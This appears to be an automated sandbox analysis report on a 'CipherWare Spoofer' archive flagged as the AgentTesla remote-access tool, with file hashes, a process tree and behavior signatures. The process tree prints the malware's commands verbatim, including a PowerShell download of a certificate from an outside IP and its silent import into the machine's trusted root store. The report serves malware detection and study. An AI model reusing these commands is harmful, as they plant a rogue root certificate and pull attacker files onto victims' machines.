Overview
overview
10Static
static
7CipherWare...29.rar
windows7-x64
3CipherWare...29.rar
windows10-2004-x64
3CipherWare...ns.txt
windows7-x64
1CipherWare...ns.txt
windows10-2004-x64
1CipherWare...ol.exe
windows7-x64
7CipherWare...ol.exe
windows10-2004-x64
7out.exe
windows7-x64
out.exe
windows10-2004-x64
CipherWare...gs.vbs
windows7-x64
3CipherWare...gs.vbs
windows10-2004-x64
1CipherWare...ol.ini
windows7-x64
1CipherWare...ol.ini
windows10-2004-x64
1CipherWare...me.url
windows7-x64
1CipherWare...me.url
windows10-2004-x64
1CipherWare.../1.png
windows7-x64
1CipherWare.../1.png
windows10-2004-x64
3CipherWare.../2.png
windows7-x64
1CipherWare.../2.png
windows10-2004-x64
3CipherWare.../3.png
windows7-x64
1CipherWare.../3.png
windows10-2004-x64
3CipherWare...ne.url
windows7-x64
1CipherWare...ne.url
windows10-2004-x64
1CipherWare...32.exe
windows7-x64
3CipherWare...32.exe
windows10-2004-x64
3CipherWare...64.exe
windows7-x64
3CipherWare...64.exe
windows10-2004-x64
3CipherWare...ub.ini
windows7-x64
1CipherWare...ub.ini
windows10-2004-x64
1CipherWare...er.exe
windows7-x64
10CipherWare...er.exe
windows10-2004-x64
10CipherWare...ss.exe
windows7-x64
9CipherWare...ss.exe
windows10-2004-x64
9Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
11-06-2024 11:21
Behavioral task
behavioral1
Sample
CipherWare Spoofer 04-29.rar
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
CipherWare Spoofer 04-29.rar
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
CipherWare Spoofer 04-29/Instructions.txt
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
CipherWare Spoofer 04-29/Instructions.txt
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender Control.exe
Resource
win7-20240215-en
Behavioral task
behavioral6
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender Control.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
out.exe
Resource
win7-20240508-en
Behavioral task
behavioral8
Sample
out.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender_Settings.vbs
Resource
win7-20240220-en
Behavioral task
behavioral10
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/Defender_Settings.vbs
Resource
win10v2004-20240426-en
Behavioral task
behavioral11
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/dControl.ini
Resource
win7-20240508-en
Behavioral task
behavioral12
Sample
CipherWare Spoofer 04-29/Requirements/Defender Control/dControl.ini
Resource
win10v2004-20240508-en
Behavioral task
behavioral13
Sample
CipherWare Spoofer 04-29/Requirements/DirectX End-User Runtime.url
Resource
win7-20240215-en
Behavioral task
behavioral14
Sample
CipherWare Spoofer 04-29/Requirements/DirectX End-User Runtime.url
Resource
win10v2004-20240426-en
Behavioral task
behavioral15
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/1.png
Resource
win7-20240419-en
Behavioral task
behavioral16
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/1.png
Resource
win10v2004-20240426-en
Behavioral task
behavioral17
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/2.png
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/2.png
Resource
win10v2004-20240508-en
Behavioral task
behavioral19
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/3.png
Resource
win7-20240221-en
Behavioral task
behavioral20
Sample
CipherWare Spoofer 04-29/Requirements/Disable IPv6 First/3.png
Resource
win10v2004-20240508-en
Behavioral task
behavioral21
Sample
CipherWare Spoofer 04-29/Requirements/Visual C++ Redistributable Runtimes All-in-One.url
Resource
win7-20240508-en
Behavioral task
behavioral22
Sample
CipherWare Spoofer 04-29/Requirements/Visual C++ Redistributable Runtimes All-in-One.url
Resource
win10v2004-20240226-en
Behavioral task
behavioral23
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x32.exe
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x32.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral25
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x64.exe
Resource
win7-20240508-en
Behavioral task
behavioral26
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Windows Update Blocker x64.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral27
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Wub.ini
Resource
win7-20240508-en
Behavioral task
behavioral28
Sample
CipherWare Spoofer 04-29/Requirements/Windows Update Blocker/Wub.ini
Resource
win10v2004-20240426-en
Behavioral task
behavioral29
Sample
CipherWare Spoofer 04-29/Spoofer.exe
Resource
win7-20240215-en
Behavioral task
behavioral30
Sample
CipherWare Spoofer 04-29/Spoofer.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral31
Sample
CipherWare Spoofer 04-29/TPM Bypass.exe
Resource
win7-20240419-en
General
-
Target
CipherWare Spoofer 04-29/Spoofer.exe
-
Size
5.9MB
-
MD5
482183f599a399384629aa7deb145b2e
-
SHA1
252c735e209efea8f92dafe4c50aea95f60915f2
-
SHA256
c941f6995ef56ab0fa76f5c604c134e86b5df21b45284e78669f3074be2473e7
-
SHA512
72eb143ae229041b9d3cd219df7cc54138c9f99f81409a825cdc9741b0483cf4dabfe7b9f410d843263cf665ebc171fbc6168c83ecbb14d123d4a3fe8d565c25
-
SSDEEP
98304:RXbIrqdcbu8gacqECpO0zSU8B2lJtc/jXwYUObL4Eyv3ZjmzTm7Sw:VIJbu8jzXyuY0YTf/+jmz5
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral30/memory/4624-34-0x0000000008700000-0x0000000008914000-memory.dmp family_agenttesla -
Blocklisted process makes network request 1 IoCs
flow pid Process 2 1820 powershell.exe -
pid Process 4576 powershell.exe 1820 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4624 UBFAFGEWG.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS UBFAFGEWG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer UBFAFGEWG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion UBFAFGEWG.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1820 powershell.exe 1820 powershell.exe 4576 powershell.exe 4576 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1820 powershell.exe Token: SeDebugPrivilege 4624 UBFAFGEWG.exe Token: SeDebugPrivilege 4576 powershell.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
pid Process 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe 932 Spoofer.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 932 wrote to memory of 1188 932 Spoofer.exe 83 PID 932 wrote to memory of 1188 932 Spoofer.exe 83 PID 1188 wrote to memory of 428 1188 cmd.exe 85 PID 1188 wrote to memory of 428 1188 cmd.exe 85 PID 428 wrote to memory of 5000 428 cmd.exe 87 PID 428 wrote to memory of 5000 428 cmd.exe 87 PID 428 wrote to memory of 3540 428 cmd.exe 88 PID 428 wrote to memory of 3540 428 cmd.exe 88 PID 428 wrote to memory of 1820 428 cmd.exe 89 PID 428 wrote to memory of 1820 428 cmd.exe 89 PID 932 wrote to memory of 4624 932 Spoofer.exe 90 PID 932 wrote to memory of 4624 932 Spoofer.exe 90 PID 932 wrote to memory of 4624 932 Spoofer.exe 90 PID 428 wrote to memory of 4576 428 cmd.exe 91 PID 428 wrote to memory of 4576 428 cmd.exe 91 PID 428 wrote to memory of 1724 428 cmd.exe 92 PID 428 wrote to memory of 1724 428 cmd.exe 92 PID 1724 wrote to memory of 3876 1724 cmd.exe 93 PID 1724 wrote to memory of 3876 1724 cmd.exe 93 PID 1724 wrote to memory of 4720 1724 cmd.exe 94 PID 1724 wrote to memory of 4720 1724 cmd.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\Spoofer.exe"C:\Users\Admin\AppData\Local\Temp\CipherWare Spoofer 04-29\Spoofer.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c @echo off & echo Running checklmao.bat silently... & start "" /min /b cmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"2⤵
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\checklmao.bat & exit"3⤵
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\system32\certutil.execertutil -store TrustedRoot4⤵PID:5000
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"4⤵PID:3540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri http://188.227.107.14/server.crt -OutFile 'C:\Users\Admin\AppData\Local\Temp\server.crt'"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Import-Certificate -FilePath 'C:\Users\Admin\AppData\Local\Temp\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -store TrustedRoot | findstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"4⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\system32\certutil.execertutil -store TrustedRoot5⤵PID:3876
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"C:\Users\Admin\AppData\Local\Temp\server.crt"5⤵PID:4720
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UBFAFGEWG.exeC:\Users\Admin\AppData\Local\Temp\UBFAFGEWG.exe2⤵
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5aa8efa56e1e40374bbd21e0e469dceb7
SHA133a592799d4898c6efdd29e132f2f76ec51dbc08
SHA25625eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.8MB
MD578f93936aa75709bc214e122c58f019a
SHA12a83b20c0fbf526cc86af4b80cbca319a21dae6d
SHA256031c83154c6efbaac14659994730e227138612c2bf740ab44fdc597868e45a61
SHA5122efb74f82ae46382bfbe9ff93f6092a2b665b5868280f218d3eeef43e6368545b66d55ba81db3ac9323a2ea5df9b960c1166b378d6503ee0a39d3689fed65d90
-
Filesize
1KB
MD5172008fe1545829cce82cfd1feb4ada1
SHA1a1eed63e579043f79f9799ad6f46131f4412a35c
SHA2566540e83a53bb1882c60487c3f31a898ead614e59d725715ec96ad1c05219d524
SHA5127bd38c65ab4100adac4d6efc2afa72db09ee6bb705c27372ce5f53b62920ab7aef3f0840f5ef5747eb9ed55bad9e4952929062cdd1a8f9da89ad3ce42f0e0cc6